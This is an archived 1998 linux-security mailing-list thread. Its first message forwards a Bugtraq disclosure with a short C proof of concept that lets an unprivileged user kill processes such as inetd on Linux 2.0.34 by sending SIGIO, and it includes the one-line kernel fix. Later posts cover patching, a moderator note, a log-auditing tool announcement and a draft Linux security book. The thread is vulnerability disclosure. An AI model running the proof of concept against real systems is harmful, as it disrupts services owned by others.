---------- Forwarded message ---------- Date: Tue, 30 Jun 1998 15:10:47 +0800 From: David Luyer <luyer@UCS.UWA.EDU.AU> To: BUGTRAQ@NETSPACE.ORG Subject: Serious Linux 2.0.34 security problem I just saw this mentioned on linux-kernel and confirmed it; #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { int s, p; if(argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } This can kill from a normal user account the inetd process under Linux 2.0.34 by sending a SIGIO. Very bad. The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number is approximately 139. David.
Linux mailing list user
1998-Jul-05 03:00 UTC
[linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
On Thu, 2 Jul 1998, Annex wrote:> I just saw this mentioned on linux-kernel and confirmed it;[...]> The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number > is approximately 139.A much simpler fix is to update to a 2.0.35preX kernel (X>=3). ftp://ftp.uk.linux.org/pub/linux/alan/2.0.35pre/ LLaP bero --- Windows 98 supports real multitasking - it can boot and crash simultaneously. *** Anyone sending unwanted advertising e-mail to this address will be charged $25 for network traffic and computing time. By extracting my address from this message or its header, you agree to these terms.
Jon Lewis
1998-Jul-05 20:40 UTC
[linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
On Sun, 5 Jul 1998, Linux mailing list user wrote:> > The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number > > is approximately 139. > > A much simpler fix is to update to a 2.0.35preX kernel (X>=3).Actually, this is such a trivial bug to fix, that for many it probably makes more sense to edit fs/fcntl.c and recompile rather than suject themselves to the latest pre-release kernel...unless they like testing pre-releases. Just out of curiosity...word of this broke in linux-kernel and bugtraq in the last days of June. Were the linux-security moderators away on holiday, or do they live in a time zone several days behind the rest of the world? [mod: Moderators have other stuff to do besides keeping an eye on linux-security. I''ve actually been pretty busy lately: I currently have three clients shouting that they want stuff done NOW. Anyway, I still try to find the time to moderate linux-security once a day. But this doesn''t have anything to do with what you mention: I don''t go and find stuff on Linux-kernel and forward it here. I let someone else do that. So if you see something on another mailing list, and think its relevant, go ahead and forward it. Regards, Roger Wolff Your Moderator. ] ------------------------------------------------------------------ Jon Lewis <jlewis@fdt.net> | Spammers will be winnuked or Network Administrator | drawn and quartered...whichever Florida Digital Turnpike | is more convenient. ______http://inorganic5.fdt.net/~jlewis/pgp for PGP public key____
<seifried@seifried.org>
1998-Jul-07 23:27 UTC
ANNOUNCE: WinAudlog, centralized logfile checking - forward from , bugtraq
>From owner-bugtraq@NETSPACE.ORG Tue Jul 7 16:23:51 1998-----BEGIN PGP SIGNED MESSAGE----- DO YOU TRUST YOUR SYSTEM''S LOGS? AudLog For Windows Secure System Log Auditing ** FREE ** AUDLOG for Windows can be used to centralize the auditing of distributed system logs in a network and certify that intruders did not modify these logs. When combined with SECURE SYSLOG, AudLog for Windows makes the perfect package for SECURE LOGGING and AUDITING: + Easy to use graphical interface + AUDLOG downloads the logs generated by SECURE SYSLOG and verifies its integrity + Allows for centralized auditing of an unlimited number of computers in a network + PEO-1 cryptographic protocol for authenticate log-files integrity + 128-bits symmetric cryptography and a challenge-response protocol for mutual authentication and confidentiality. + Iconized Security flags for log-files, hosts and groups of hosts. SECURE SYSLOG (ssyslog) is available for UNIX systems. Designed to replace the syslog daemon, ssyslog implements a cryptographic protocol called PEO-1 that allows the remote auditing of system logs. Auditing remains possible even if an intruder gains superuser privileges in the system, the protocol guarantees that the information logged before and during the intrusion process cannot be modified without the auditor (on a remote, trusted host) noticing. What is AudLog for Windows? ~~~~~~~~~~~~~~~~~~~~~~~~~~ Audlog is a Win95/WinNT program that lets you manipulate logfiles from a centralized point in your network. It works in conjuction with Secure Syslog, a replacement for the UNIX syslogd that provides cryptographic mechanisms to verify the integrity of the log files. Secure Syslog provides a way auditing the log files remotely, from a trusted auditing host using the provided UNIX utility called ''audlog''. WinAudlog is the equivalent program for MS Windows, it features an easy to use interface, the required crypto algorithms for authentication, data transfer and integrity checking. AUDLOG was developed in CORELABS, the research labs of CORE SDI S.A., and is now being distributed freely. AUDLOG and SECURE SYSLOG are FREE. To get the binary for Windows 95/NT go to: - ------------------------------------------- <http://www.core-sdi.com/audlog> To get the source code and/or more information regarding ssyslog go to: - ----------------------------------------------------------------------- <http://www.core-sdi.com/ssyslog> To get more information about CORELABS, SECURE LOGGING or PEO go to: - -------------------------------------------------------------------- <http://www.core-sdi.com/ENGLISH/CoreLabs> -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNaKG8vnO/LnPTgz1AQEt1AP+LBAKZlvNcPxBlTkYm3RxGzW/zPFAlHdg bMlPfgT5gU17C+xuBsfkrNJ/cQ92QDaUmFu7YM1/g3fgg9I8qzHEUv55asxdD86F JTUzhKSM1E3/iu2ZbksX6kAFwUyG05csw8xCm1sz9Rlauu4wnjmVHvyQ4erZha3Z CKX+PKfxVOc=Bpl9 -----END PGP SIGNATURE----- -- ==============================[ CORE Seguridad de la Informacion S.A. ]======Ivan Arce Gerencia de Tecnologia Email : ivan@core-sdi.com Av. Santa Fe 2861 5to C TE : +54-1-821-1030 CP 1425 FAX : +54-1-821-1030 Buenos Aires, Argentina Mensajeria: +54-1-317-4157 ============================================================================= ---end of message -seifried
I was looking around for a book specifically on Linux security a week or two ago, and couldn''t find any. I wanted something Linux specific as opposed to say O''Reilly''s yellow safe book. Couldn''t find any (not even at our local computer book store which has 50+ linux titles). So I looked through RedHat''s site, the manuals that came with 4.1, 5.0, and 5.1 nothing there. How odd I thought. So I started writing one, it is pretty RedHat specific (as the subject of this email would imply). I would like to get some feedback before I continue, a.k.a. is it worthwhile/useful? http://www.seifried.org/redhat-security/ and in case the dns fall down go boom because we''re moving them to a newer, faster network connection (and the internic seems the be responding somewhat slowly): http://24.108.11.200/redhat-security/ Please don''t flame me over details/etc, if you spot an error tell me and I will fix it (I have been pretty careful though, it is supposed to be a book on security =). -seifried